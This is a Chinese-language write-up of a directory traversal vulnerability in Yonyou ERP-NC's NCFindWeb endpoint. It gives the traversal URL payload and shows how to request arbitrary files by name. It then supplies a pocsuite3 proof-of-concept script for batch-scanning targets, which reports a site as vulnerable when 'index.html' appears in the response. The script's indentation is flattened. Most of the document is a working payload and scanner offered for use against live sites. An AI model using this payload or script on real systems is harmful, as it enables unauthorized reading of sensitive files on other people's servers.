用友NC 漏洞

漏洞描述

用友ERP-NC 存在目录遍历漏洞，攻击者可以通过目录遍历获取敏感文件信息。

fofa：

poc：/NCFindWeb?service=IPreAlertConfigService&filename=
在url处拼接poc后可以看到该站点的目录和文件

访问某个文件
/NCFindWeb?service=IPreAlertConfigService&filename=文件名

编写poc批量验证
这里使用的是pocsuite3的poc模板

# 调用pocsuite的一些API函数
from pocsuite3.api import Output, register_poc, requests, POCBase# 继承POCBase类
class DemoPOC(POCBase):
vulID = '0' # ssvid ID， 如果是提交漏洞的同时提交PoC，则写出0
version = "1" # 版本
author = "" # 作者名称
vulDate = '' # 漏洞公开时间
createDate = '' #编写POC时间
updateDate = '' # 更新POC时间
references = [""] #漏洞地址来源，0day不用写
name = '用友 ERP-NC NCFindWeb 目录遍历漏洞 Poc' # POC名称
appPowerLink = '' # 漏洞厂商的主页地址
appName = '用友' # 漏洞应用名称
appVersion = '用友 ERP-NC NCFindWeb' # 漏洞影响版本
vulType = '' # 漏洞类型
desc = """
用友ERP-NC 存在目录遍历漏洞，攻击者可以通过目录遍历获取敏感文件信息
""" # 漏洞简要描述
samples = [] # 测试样例，使用POC测试成功的网站
install_requires = []# 定义--verify参数，poc函数
def _verify(self):
payload = '/NCFindWeb?service=IPreAlertConfigService&filename='
result={}
target=self.url
req=requests.get(target+payload)
res=req.text
if('index.html' in res):
result['VerifyInfo']={}
result['VerifyInfo']['URL'] = target
result['VerifyInfo']['payload'] = payload
return self.parse_output(result)def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable.')
# 返回成功或失败消息
return output# 定义--attack参数，attack函数
def _attack(self):
return self._verify()# 注册poc
register_poc(DemoPOC)

只需要修改_verify()部分即可
payload=’/NCFindWeb?service=IPreAlertConfigService&filename=’
if判断返回的数据出现index.html文件名则代表存在漏洞，否则不存在